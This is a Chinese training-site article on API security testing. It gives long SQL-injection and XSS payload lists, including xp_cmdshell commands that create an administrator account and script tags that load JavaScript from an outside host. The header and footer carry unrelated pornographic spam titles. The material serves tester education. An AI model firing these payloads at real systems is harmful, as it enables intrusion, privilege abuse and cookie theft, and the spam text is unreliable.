麻豆黑色丝袜jk制服福利网站-麻豆精品传媒视频观看-麻豆精品传媒一二三区在线视频-麻豆精选传媒4区2021-在线视频99-在线视频a

千鋒教育-做有情懷、有良心、有品質的職業教育機構

手機站
千鋒教育

千鋒學習站 | 隨時隨地免費學

千鋒教育

掃一掃進入千鋒手機站

領取全套視頻
千鋒教育

關注千鋒學習站小程序
隨時隨地免費學習課程

當前位置:首頁  >  技術干貨  > 基于接口的安全測試你會了嗎

基于接口的安全測試你會了嗎

來源:千鋒教育
發布人:qyf
時間: 2022-09-02 17:00:46 1662109246

基于接口的安全測試你會了嗎

  一、 接口測試安全場景

  相信大家都曾經為黃牛票而憤憤不平吧,但你只能忍氣吞聲,畢竟懂技術的流氓更可怕,像攜程加速、飛豬加速也用過吧,這種流氓更讓人無可奈何。

  其實了解了接口測試,就不再去“神話“他們“黃牛逼”。

  無非就是在一定的授權范圍內,不斷的批量去請求12306的購票端口,借助自身更大的帶寬和算力去pk我們普通用戶而已,在12306出了候補后,基本就沒啥用了。

  安全測試說白了就是攻與防的問題,知己知彼才能百戰百勝。

  二、 接口安全設計的原則

  現在前后段分離式設計,web系統、APP的接口都采用restful架構,restful最重要的一個設計原則就是客戶端與服務端的交互在請求之間是無狀態的,并采用token的認證方式,以便在多端設備進行鑒權。

  1、盡量使用更安全的https協議報文

  2、接口參數采用非對稱加密算法進行簽名

  3、接口參數需要校驗,如表單提交使用驗證碼進行校驗

  4、多次失敗后需要有鎖定機制,防止爆破

  5、接口對應用戶權限,用戶只能調用有權限的接口

  6、系統接口做過負荷機制用來保護系統安全

  7、接口盡量少返回服務錯誤信息給用戶

  三、 接口安全測試

  1、sql注入

  Sql注入可以算是最常見的一種攻擊手段了,作為測試人員,一定要熟悉各種sql注入的手段,在測試過程中就封堵這個風險,當然現在的很多開發框架也具備了防范sql注入的能力。

  測試中,我們需要設置如下的注入案例:

  admin'--

  ' or 0=0 --

  " or 0=0 --

  or 0=0 --

  ' or 0=0 #

  " or 0=0 #

  or 0=0 #

  ' or 'x'='x

  " or "x"="x

  ') or ('x'='x

  ' or 1=1--

  " or 1=1--

  or 1=1--

  ' or a=a--

  " or "a"="a

  ') or ('a'='a

  ") or ("a"="a

  hi" or "a"="a

  hi" or 1=1 --

  hi' or 1=1 --

  hi' or 'a'='a

  hi') or ('a'='a

  hi") or ("a"="a[/code]

  'and ( ) exec insert * % chr mid

  and 1=1 ; And 1=1 ; aNd 1=1 ; char(97)char(110)char(100) char(49)char(61)char(49);%20AND%201=2

  'and 1=1 ; 'And 1=1 ; 'aNd 1=1 ;

  and 1=2 ; 'and 1=2

  and 2=2

  and user>0

  and (select count(*) from sysobjects)>0

  and (select count(*) from msysobjects)>0

  and (Select Count(*) from Admin)>=0

  and (select top 1 len(username) from Admin)>0(username 已知字段)

  ;exec master..xp_cmdshell "net user name password /add"--

  ;exec master..xp_cmdshell "net localgroup name administrators /add"--

  and 0<>(select count(*) from admin)

  2、xss攻擊

  利用XSS的攻擊者進行攻擊時會向頁面插入惡意Script代碼,當用戶瀏覽該頁面時,嵌入在頁面里的Script代碼會被執行,從而達到攻擊用戶的目的。同樣會造成用戶的認證信息被獲取,仿冒用戶登錄,造成用戶信息泄露等危害。

  測試中,我們需要設置如下的xss攻擊案例:

><scrīpt>alert(document.cookie)</scrīpt>

='><scrīpt>alert(document.cookie)</scrīpt>

<scrīpt>alert(document.cookie)</scrīpt>

<scrīpt>alert(helloworld)</scrīpt>

%3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E

<scrīpt>alert('XSS')</scrīpt>

<img src="javascrīpt:alert('XSS')">

<scrīpt>alert('linda is ok');</scrīpt>

<scrīpt>alert('Vulnerable')</scrīpt>

?sql_debug=1

a%5c.aspx

a.jsp/<scrīpt>alert('Vulnerable')</scrīpt>

a/

a?<scrīpt>alert('Vulnerable')</scrīpt>

"><scrīpt>alert('Vulnerable')</scrīpt>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E

%3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E&

%3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

<IMG SRC="jav ascrīpt:alert('XSS');">

<IMG SRC="jav ascrīpt:alert('XSS');">

<IMG SRC="jav ascrīpt:alert('XSS');">

"<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out

<IMG SRC=" javascrīpt:alert('XSS');">

<scrīpt>a=/XSS/alert(a.source)</scrīpt>

<BODY BACKGROUND="javascrīpt:alert('XSS')">

<BODY ōNLOAD=alert('XSS')>

<IMG DYNSRC="javascrīpt:alert('XSS')">

<IMG LOWSRC="javascrīpt:alert('XSS')">

<BGSOUND SRC="javascrīpt:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');">

<IMG SRC='vbscrīpt:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescrīpt:[code]">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');">

SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt a=">" '' SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt "a='>'" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>

  3、用戶賬號及暴力攻擊

  用戶賬號信息是訪問系統獲取服務的最關鍵的一環,如果泄露了信息就沒有任何安全可言,通過利用賬戶登錄接口大量猜測和窮舉的方式來嘗試獲取用戶口令。就是猜口令咯,攻擊者一直枚舉進行請求,通過對比數據包的長度可以很好的判斷是否爆破成功,因為爆破成功和失敗的長度是不一樣的,所以可以很好的判斷是否爆破成功。

  作為測試人員,需要對賬戶信息進行如下測試:

  檢測接口程序連接登錄時,是否需要輸入相應的用戶

  是否設置密碼最小長度

  用戶名和密碼中是否可以有空格或回車?

  是否允許密碼和用戶名一致

  防惡意注冊:可否用自動填表工具自動注冊用戶?

  遺忘密碼處理是否有校驗碼?

  密碼錯誤次數有無限制?

  大小寫敏感?

  口令不允許以明碼顯示在輸出設備上

  強制修改的時間間隔限制(初始默認密碼)

  口令的唯一性限制(看需求是否需要)

  口令過期失效后,是否可以不登陸而直接瀏覽某個頁面

  更多關于軟件測試培訓的問題,歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經驗,采用全程面授高品質、高體驗培養模式,擁有國內一體化教學管理及學員服務,助力更多學員實現高薪夢想。

tags:
聲明:本站稿件版權均屬千鋒教育所有,未經許可不得擅自轉載。
10年以上業內強師集結,手把手帶你蛻變精英
請您保持通訊暢通,專屬學習老師24小時內將與您1V1溝通
免費領取
今日已有369人領取成功
劉同學 138****2860 剛剛成功領取
王同學 131****2015 剛剛成功領取
張同學 133****4652 剛剛成功領取
李同學 135****8607 剛剛成功領取
楊同學 132****5667 剛剛成功領取
岳同學 134****6652 剛剛成功領取
梁同學 157****2950 剛剛成功領取
劉同學 189****1015 剛剛成功領取
張同學 155****4678 剛剛成功領取
鄒同學 139****2907 剛剛成功領取
董同學 138****2867 剛剛成功領取
周同學 136****3602 剛剛成功領取
相關推薦HOT
主站蜘蛛池模板: 性高湖久久久久久久久| 欧美高清成人| gogogo高清在线播放| 日韩欧美一区黑人vs日本人| 天堂mv免费mv在线mv观看| 欧美色视频在线观看| 老师您的兔子好软水好多动漫视频| 网曝门精品国产事件在线观看| 美国式禁忌芭芭拉| 嘟嘟嘟www在线观看免费高清| 丰满上司的美乳| 久久综合狠狠综合久久综合88| 狠色狠色狠狠色综合久久| 久久一本岛在免费线观看2020| 中文字幕精品亚洲无线码二区| 美团外卖猛男男同38分钟| 天堂а√8在线最新版在线| 成年女人a毛片免费视频| 午夜爽爽| 桃花影院www视频播放| 久久影院午夜伦手机不四虎卡| 91国语精品自产拍在线观看一| 国产精品国产精品国产专区不卡| zooslook欧美另类最新| 大陆黄色a级片| 色播在线电影| 玩山村女娃的小屁股| 被夫上司强迫的女人在线中文| 美女被吸乳羞羞动漫| 精品久久久久久久中文字幕| 黄色三级免费电影| 无翼乌口工| 欧美高清hd| 亚洲第一成年免费网站| 红色一级毛片| 欧美xxxx做受欧美| 用我的手指搅乱我吧第五集| 国产69精品久久久久妇女| 国内精品久久久久影院网站| 日本三区四区免费高清不卡| 日韩成人在线网站|